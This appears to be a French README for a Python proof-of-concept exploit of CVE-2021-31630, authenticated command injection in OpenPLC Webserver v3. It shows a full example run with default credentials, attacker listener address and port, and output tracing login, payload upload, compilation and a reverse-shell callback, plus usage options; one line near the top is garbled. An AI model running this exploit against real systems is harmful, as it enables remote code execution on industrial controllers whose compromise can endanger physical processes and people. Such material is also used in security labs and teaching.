
Script Python pour exploiter l'injection de commandes dans Open PLC Webserver v3
Ce script PoC est basé sur l'exploit fourni par Fellipe Oliveira.
/hardware au lieu d'un fichier st;)$ python cve_2021_31630.py -lh 10.10.16.68 -lp 4444 http://10.10.11.7:8080
------------------------------------------------
--- CVE-2021-31630 -----------------------------
--- OpenPLC WebServer v3 - Authenticated RCE ---
------------------------------------------------
[>] Found By : Fellipe Oliveira
[>] PoC By : thewhiteh4t [ https://twitter.com/thewhiteh4t ]
[>] Target : http://10.10.11.7:8080
[>] Username : openplc
[>] Password : openplc
[>] Timeout : 20 secs
[>] LHOST : 10.10.16.68
[>] LPORT : 4444
[!] Checking status...
[+] Service is Online!
[!] Logging in...
[+] Logged in!
[!] Restoring default program...
[+] PLC Stopped!
[+] Cleanup successful!
[!] Uploading payload...
[+] Payload uploaded!
[+] Waiting for 5 seconds...
[+] Compilation successful!
[!] Starting PLC...
[+] PLC Started! Check listener...
[!] Cleaning up...
[+] PLC Stopped!
[+] Cleanup successful!
pip3 install requests
usage: cve_2021_31630.py [-h] [-u U] [-p P] [-t T] -lh LH -lp LP url
positional arguments:
url URL cible avec http(s)://
options:
-h, --help afficher ce message d'aide et quitter
-u U Nom d'utilisateur
-p P Mot de passe
-t T Délai d'attente de la requête, augmenter si le serveur est lent
-lh LH LHOST
-lp LP LPORT